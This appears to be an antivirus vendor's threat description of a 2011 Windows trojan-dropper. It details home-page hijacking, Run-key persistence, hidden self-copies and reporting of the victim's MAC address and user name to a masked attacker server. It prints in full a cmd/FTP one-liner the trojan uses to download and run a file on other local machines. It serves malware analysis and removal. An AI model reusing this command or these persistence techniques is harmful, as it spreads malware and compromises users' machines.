|Detected||Jun 29 2011 09:10 GMT|
|Released||Jun 29 2011 11:00 GMT|
|Published||Oct 10 2011 07:30 GMT|
A trojan program that installs and launches other software on the infected computer without the user's knowledge. It is a Windows application (PE EXE-file). 25169 bytes. The program is packed by an unknown packer. Its unpacked size is around 74 kB. Written in C++.
If the path to the trojan file does not contain a sequence of "ommon" symbols, the trojan will retrieve a script from its body and will launch this script under the following name:
%ProgramFiles%\<rnd>.hta<rnd> is a sequence of three Latin symbols, for example, "YSQ".
This file is 803 bytes and is detected by Kaspersky Antivirus as Trojan.VBS.StartPage.hw.
The launch of this trojan script leads to a change in the default home page and search page for the Internet Explorer browser by adding the following information to the system registry key:
[HKCU\Software\Microsoft\Internet Explorer\Main] "Start Page" = "www.5***ling.com" "Search Page" = "www.5***iling.com" "default_page_url" = "www.5***ling.com"and also ensures the automatic launch of a copy of the trojan every time the system is started:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exeThe trojan then creates a copy of its file under the name "coiome.exe" and deletes its original file:
%ProgramFiles%\Common Files\sebsbvx\coiome.exeThe file also has its creation date set as "17.08.2009", and the directory in which the trojan copy is found is given the attributes "hidden" and "system":
%ProgramFiles%\Common Files\sebsbvxWhen creating a copy of itself, the trojan may add a random sequence of symbols to the file so that the trojan copy hash files vary. The trojan may also add a sequence of "2" symbols to the file, thus increasing the size of its copy.
The trojan then launches its copy and shuts down.
The trojan downloads the file from the following URL:
http://j.q***800.com/b.jpgand saves the downloaded file under the following name:
%WinDir%\Fonts\oh.iniThis file is a configuration file and is used further by the trojan. Using the system file:
%System%\sc.exeit automatically launches services with the following names:
lanmanworkstation lanmanserver RpcLocator Browser NtLmSsp LmHostsAfter this, it launches the above mentioned service using the system file:
%System%\net1.exeThe trojan then sends the request to the attacker's server in order to transfer the data about the infected computer in the following request:
http://tj.q***800.com/t/Count.asp?mac=<MAC-user's computer address>&ver=01&t=<name of computer user>The following response came from the server when creating the description:
addokTo conceal its work online, it deletes the files from the following directories in a separate string:
%userprofile%\Cookies\*.* %userprofile%\Local Settings\Temporary Internet Files\*.* %userprofile%\Local Settings\Temp\Cookies\*.*Before deleting, it removes the "read only", "hidden", "system", and "archive" attributes from the files.
It creates a directory named:
%AppData%\f.exeIt deletes information from the registry about the service called:
JavaServeIt deletes the following files:
%ProgramFiles%\Internet Explorer\usp10.dll %WinDir%\ModFan\mone.dll %WinDir%\UoDo\game.dllThe trojan retrieves the following file from its body:
%WinDir%\Tasks\<rnd2>i.vbe<rnd2> is a sequence of 3random Latin symbols.
This file is 2117 bytes. The file is a subsidiary and is used for the trojan's further work.
It then removes the following file from its body:
%WinDir%\Tasks\<rnd3>e.exe<rnd3> is a sequence of 3 random Latin letters, for example, "DNP".
This file is detected by Kaspersky Antivirus as Exploit.Win32.IMG-WMF.fk. In the extracted file, it enters the working time of the user's computer so that the hash files vary each time they are created. The trojan may also add a sequence of the "0" value to the file so that the file may be differentiated in size from 3748 bytes.
The trojan determines the IP-address of the user's computer and then reads and deciphers the previously retrieved configuration file named:
%WinDir%\Fonts\oh.inithe trojan obtains one of the following parameters from this file which it will use to launch the file:
%WinDir%\Tasks\<rnd3>e.exe <parameter1> <parameter2><parameter1> - IP-address (the trojan lists the IP-addresses of the local network where the infected computer is located)
The configuration file contained the following link when creating the description:
http://dh***88.org/p/mi.exe (32891 bytes, detected by Kaspersky Antivirus as Trojan-Downloader.Win32.Geral.adeh)It then runs the following type of command:
%System%\cscript.exe %WinDir%\Tasks\<rnd2>i.vbe <IP-address of the attacked computer> administrator "" "cmd /c @echo open 184.108.40.206>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"The trojan therefore tries to download and launch a file from the FTP-server named "n.exe" on the attacked computer. After a successful launch, it deletes this file.
It deletes the file before shutting down:
If your computer has not been protected with anti-virus software and has been infected with malware, you will need to take the following actions to delete this:
%ProgramFiles%\<rnd>.hta %ProgramFiles%\Common Files\sebsbvx\coiome.exe %WinDir%\Fonts\oh.ini %WinDir%\Tasks\<rnd2>i.vbe %WinDir%\Tasks\<rnd3>e.exe
[HKCU\Software\Microsoft\Internet Explorer\Main] "Start Page" "Search Page" "default_page_url"
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe
%Temporary Internet Files%
Trojan-Dropper programs are designed to secretly install malicious programs built into their code to victim computers.
This type of malicious program usually save a range of files to the victim’s drive (usually to the Windows directory, the Windows system directory, temporary directory etc.), and launches them without any notification (or with fake notification of an archive error, an outdated operating system version, etc.).
Such programs are used by hackers to: